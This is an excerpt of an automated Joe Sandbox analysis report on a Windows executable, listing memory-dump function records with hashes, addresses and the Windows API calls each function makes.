                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __alldvrm$_strrchr
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1036877536-0
                                                                                                                  • Opcode ID: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                                                                                                                  • Instruction ID: 80773fc32ffb3e1dcf2e349734e610354eaca6776437125c2ccabea395641031
                                                                                                                  • Opcode Fuzzy Hash: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
                                                                                                                  • Instruction Fuzzy Hash: 26A12672D003C69FEB25CF5AC8917AEBBF9EF69350F1442ADE5859B281C2388D41C750
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$ClearInitInitializeUninitialize
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1998397398-0
                                                                                                                  • Opcode ID: 7260b1f06166447b58176f4a2779fe03171e58634ad2b37c7ad6f3a5d3bc5f9b
                                                                                                                  • Instruction ID: 6840ce9685688a1d0acb0895ca5a7a31902fd707c6d6f175b0eb8e1734d923f9
                                                                                                                  • Opcode Fuzzy Hash: 7260b1f06166447b58176f4a2779fe03171e58634ad2b37c7ad6f3a5d3bc5f9b
                                                                                                                  • Instruction Fuzzy Hash: 28A139756043009FC710DF28C586A6AB7E9FF88714F158999F98A9B362DB70EE01CB91
                                                                                                                  APIs
                                                                                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00B4FC08,?), ref: 00B105F0
                                                                                                                  • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00B4FC08,?), ref: 00B10608
                                                                                                                  • CLSIDFromProgID.OLE32(?,?,00000000,00B4CC40,000000FF,?,00000000,00000800,00000000,?,00B4FC08,?), ref: 00B1062D
                                                                                                                  • _memcmp.LIBVCRUNTIME ref: 00B1064E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FromProg$FreeTask_memcmp
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 314563124-0
                                                                                                                  • Opcode ID: abe7b01e6df3088ce27989d330b55ad2649e90f4493a321e0ea2ae88ec830bfc
                                                                                                                  • Instruction ID: 359f1a14c99a76995eef2787fe626763815e32aae7f9fd3bd1bb28299e38b6f9
                                                                                                                  • Opcode Fuzzy Hash: abe7b01e6df3088ce27989d330b55ad2649e90f4493a321e0ea2ae88ec830bfc
                                                                                                                  • Instruction Fuzzy Hash: 94811B75A10109EFCB04DF94C984EEEB7F9FF89315F204598E506AB250DB71AE86CB60
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 269201875-0
                                                                                                                  • Opcode ID: bf7875a7d6f60f401c02425e6455d743cfa6ba7de6f934259b3fd9de78b00a0f
                                                                                                                  • Instruction ID: f9795f071ea85aed73b80d782c52a689e91049754e3cb93d57ab9572cc89473b
                                                                                                                  • Opcode Fuzzy Hash: bf7875a7d6f60f401c02425e6455d743cfa6ba7de6f934259b3fd9de78b00a0f
                                                                                                                  • Instruction Fuzzy Hash: F7414D75A0020CEBDB216BFE9D456BF3AB4EF81771F144226FA1AD7292E634484152B1
                                                                                                                  APIs
                                                                                                                  • GetWindowRect.USER32(017EE7A0,?), ref: 00B462E2
                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00B46315
                                                                                                                  • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00B46382
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$ClientMoveRectScreen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3880355969-0
                                                                                                                  • Opcode ID: 45b8fef7e43787bdc926b0bfe897319e2788f2471306cbf9b7e058c055d2cebf
                                                                                                                  • Instruction ID: 96309c4ea415c42bd5f8db2db8cffda72e0119a1e13d735e97d8bc94bbe3806d
                                                                                                                  • Opcode Fuzzy Hash: 45b8fef7e43787bdc926b0bfe897319e2788f2471306cbf9b7e058c055d2cebf
                                                                                                                  • Instruction Fuzzy Hash: A9513C74A01249AFCF14DF68D8809AE7BF5FB46364F108599F8159B2A0D730EE41DB51
                                                                                                                  APIs
                                                                                                                  • socket.WSOCK32(00000002,00000002,00000011), ref: 00B31AFD
                                                                                                                  • WSAGetLastError.WSOCK32 ref: 00B31B0B
                                                                                                                  • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00B31B8A
                                                                                                                  • WSAGetLastError.WSOCK32 ref: 00B31B94
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$socket
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1881357543-0
                                                                                                                  • Opcode ID: 71c0d50beff4da0533ab93a564b5633cd3b41b8d2a3445daa2d7e5fb157e51b4
                                                                                                                  • Instruction ID: 052880c49774b8b51ac08faccfcf60b7fe4edf6487c7bd7aec7278276e07aff3
                                                                                                                  • Opcode Fuzzy Hash: 71c0d50beff4da0533ab93a564b5633cd3b41b8d2a3445daa2d7e5fb157e51b4
                                                                                                                  • Instruction Fuzzy Hash: CF41A234600200AFE720AF24C986F6A77E9EB44718F54849CF91A9F7D3E772DD418B91
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 181df27bc4160b02e470e49f0944c29593792b53b011c08a7e9cbea9892d63f1
                                                                                                                  • Instruction ID: 911d1d48c22658c089ea3f4cd291731d2de98cd6108aebb59ac1b2e95f55872f
                                                                                                                  • Opcode Fuzzy Hash: 181df27bc4160b02e470e49f0944c29593792b53b011c08a7e9cbea9892d63f1
                                                                                                                  • Instruction Fuzzy Hash: 63412971A10344BFD7249F79CD45BABBBE9EB84710F10852EF512DB2C1D371990187A0
                                                                                                                  APIs
                                                                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00B25783
                                                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 00B257A9
                                                                                                                  • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00B257CE
                                                                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00B257FA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3321077145-0
                                                                                                                  • Opcode ID: 02204a356860b1a7bf7d916f1e98c89fb104eef4c0f13c5c0a851ff13463ad5b
                                                                                                                  • Instruction ID: aa3978bb65242331e8d623d5ec21fd1ca017bda87d40fa1ceaa3c045802027e1
                                                                                                                  • Opcode Fuzzy Hash: 02204a356860b1a7bf7d916f1e98c89fb104eef4c0f13c5c0a851ff13463ad5b
                                                                                                                  • Instruction Fuzzy Hash: 5E410B39600610DFCB21DF15C545A5EBBE6EF89720B19C488E84AAB362CB74FD40DB91
                                                                                                                  APIs
                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00AD6D71,00000000,00000000,00AD82D9,?,00AD82D9,?,00000001,00AD6D71,8BE85006,00000001,00AD82D9,00AD82D9), ref: 00AED910
                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00AED999
                                                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00AED9AB
                                                                                                                  • __freea.LIBCMT ref: 00AED9B4
                                                                                                                    • Part of subcall function 00AE3820: RtlAllocateHeap.NTDLL(00000000,?,00B81444,?,00ACFDF5,?,?,00ABA976,00000010,00B81440,00AB13FC,?,00AB13C6,?,00AB1129), ref: 00AE3852
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2652629310-0
                                                                                                                  • Opcode ID: b7e67ba812ba5dc40cba14c5232180a77a174166b1a3c5278a43c5262f9281f8
                                                                                                                  • Instruction ID: a355525aec8c5ac5aef929398367436712c8bcd230ae6cc999399a9e9020060e
                                                                                                                  • Opcode Fuzzy Hash: b7e67ba812ba5dc40cba14c5232180a77a174166b1a3c5278a43c5262f9281f8
                                                                                                                  • Instruction Fuzzy Hash: D431CD72A0024AABDF24DF66DC45EAE7BA5EB41710F054169FC05DB252EB35CD50CBA0
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 00B45352
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00B45375
                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B45382
                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B453A8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LongWindow$InvalidateMessageRectSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3340791633-0
                                                                                                                  • Opcode ID: 45c0ee4b2ae6296d785ae000028ab9575cbc4bbb5fd5714dcaea63768ae413bb
                                                                                                                  • Instruction ID: f1384e16077f9cea2cf7d2424ac5e7e542c9c4d90066bc4a357efb5dee069b14
                                                                                                                  • Opcode Fuzzy Hash: 45c0ee4b2ae6296d785ae000028ab9575cbc4bbb5fd5714dcaea63768ae413bb
                                                                                                                  • Instruction Fuzzy Hash: EF316D35A56E0CAFEB309E14CC45BE977E5EB05390F584181BA12961E2C7B49F40FB4A
                                                                                                                  APIs
                                                                                                                  • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00B1ABF1
                                                                                                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 00B1AC0D
                                                                                                                  • PostMessageW.USER32(00000000,00000101,00000000), ref: 00B1AC74
                                                                                                                  • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00B1ACC6
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 432972143-0
                                                                                                                  • Opcode ID: f1e6f56a7eae088041729b9b5fcc732cc9366c6262924af0ca8686e5e99a6c1a
                                                                                                                  • Instruction ID: e685e1866c8a6cc13494457a1ac319144198de8dd8386f81628f31e1007b9aec
                                                                                                                  • Opcode Fuzzy Hash: f1e6f56a7eae088041729b9b5fcc732cc9366c6262924af0ca8686e5e99a6c1a
                                                                                                                  • Instruction Fuzzy Hash: 0B312630A01318AFEF35CB658C047FA7BE5EB89710F84429AE485932D1D375AAC587D2
                                                                                                                  APIs
                                                                                                                  • ClientToScreen.USER32(?,?), ref: 00B4769A
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00B47710
                                                                                                                  • PtInRect.USER32(?,?,00B48B89), ref: 00B47720
                                                                                                                  • MessageBeep.USER32(00000000), ref: 00B4778C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1352109105-0
                                                                                                                  • Opcode ID: ddf66a236ea5ac8cc2b55501aec3c615f12e2f12d3659433d0dc23ec4a842170
                                                                                                                  • Instruction ID: c12b53241ea99846778e2cf82bb2e1cd2abb0f698267ac833abec89fd78cec62
                                                                                                                  • Opcode Fuzzy Hash: ddf66a236ea5ac8cc2b55501aec3c615f12e2f12d3659433d0dc23ec4a842170
                                                                                                                  • Instruction Fuzzy Hash: B9418D38646214DFCB12CF58C894EA97BF9FF49714F5584E8E4249B261CB30AE42DF90
                                                                                                                  APIs
                                                                                                                  • GetForegroundWindow.USER32 ref: 00B416EB
                                                                                                                    • Part of subcall function 00B13A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B13A57
                                                                                                                    • Part of subcall function 00B13A3D: GetCurrentThreadId.KERNEL32 ref: 00B13A5E
                                                                                                                    • Part of subcall function 00B13A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00B125B3), ref: 00B13A65
                                                                                                                  • GetCaretPos.USER32(?), ref: 00B416FF
                                                                                                                  • ClientToScreen.USER32(00000000,?), ref: 00B4174C
                                                                                                                  • GetForegroundWindow.USER32 ref: 00B41752
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2759813231-0
                                                                                                                  • Opcode ID: 26786cdf143f8b560ef55ba453fae4ff9b0be13759ae166e238dc520c3be3b6b
                                                                                                                  • Instruction ID: de38a227eb9e4795ad5b8a48b36712d3475e5982b74760b35b0b544e80c83b7a
                                                                                                                  • Opcode Fuzzy Hash: 26786cdf143f8b560ef55ba453fae4ff9b0be13759ae166e238dc520c3be3b6b
                                                                                                                  • Instruction Fuzzy Hash: FB311075D00249AFC700EFA9C981DEEBBFDEF49304B5444A9E415E7212D6359E45CBA0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB7620: _wcslen.LIBCMT ref: 00AB7625
                                                                                                                  • _wcslen.LIBCMT ref: 00B1DFCB
                                                                                                                  • _wcslen.LIBCMT ref: 00B1DFE2
                                                                                                                  • _wcslen.LIBCMT ref: 00B1E00D
                                                                                                                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00B1E018
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcslen$ExtentPoint32Text
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3763101759-0
                                                                                                                  • Opcode ID: 2b1cd884d3a32ad6da4f28ccf47daa5da6d82f2f923e196d8819b15a9d004ff2
                                                                                                                  • Instruction ID: 1a8f25d091cdcd1bb9c5de6eaeb8d3344ec596c7d6e337bb622a6b804485f741
                                                                                                                  • Opcode Fuzzy Hash: 2b1cd884d3a32ad6da4f28ccf47daa5da6d82f2f923e196d8819b15a9d004ff2
                                                                                                                  • Instruction Fuzzy Hash: 6F21E575D00214AFCB10DFA8C982BAEB7F8EF49750F1440A5E815BB342D670DE41CBA1
                                                                                                                  APIs
                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00B1D501
                                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00B1D50F
                                                                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 00B1D52F
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00B1D5DC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 420147892-0
                                                                                                                  • Opcode ID: 768c830410df81ec89af1e01f627c65a312fbd5e3bcc40beb00fcfa7c753ffd0
                                                                                                                  • Instruction ID: 86924fc8e6f424492b644977e5d7d176ebf7c12efe695bc76af5c43383c3e074
                                                                                                                  • Opcode Fuzzy Hash: 768c830410df81ec89af1e01f627c65a312fbd5e3bcc40beb00fcfa7c753ffd0
                                                                                                                  • Instruction Fuzzy Hash: 9C318F711083009FD300EF54C885AEFBBE8EF9A354F54092DF585971A2EB719A85CB92
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AC9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AC9BB2
                                                                                                                  • GetCursorPos.USER32(?), ref: 00B49001
                                                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00B07711,?,?,?,?,?), ref: 00B49016
                                                                                                                  • GetCursorPos.USER32(?), ref: 00B4905E
                                                                                                                  • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00B07711,?,?,?), ref: 00B49094
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2864067406-0
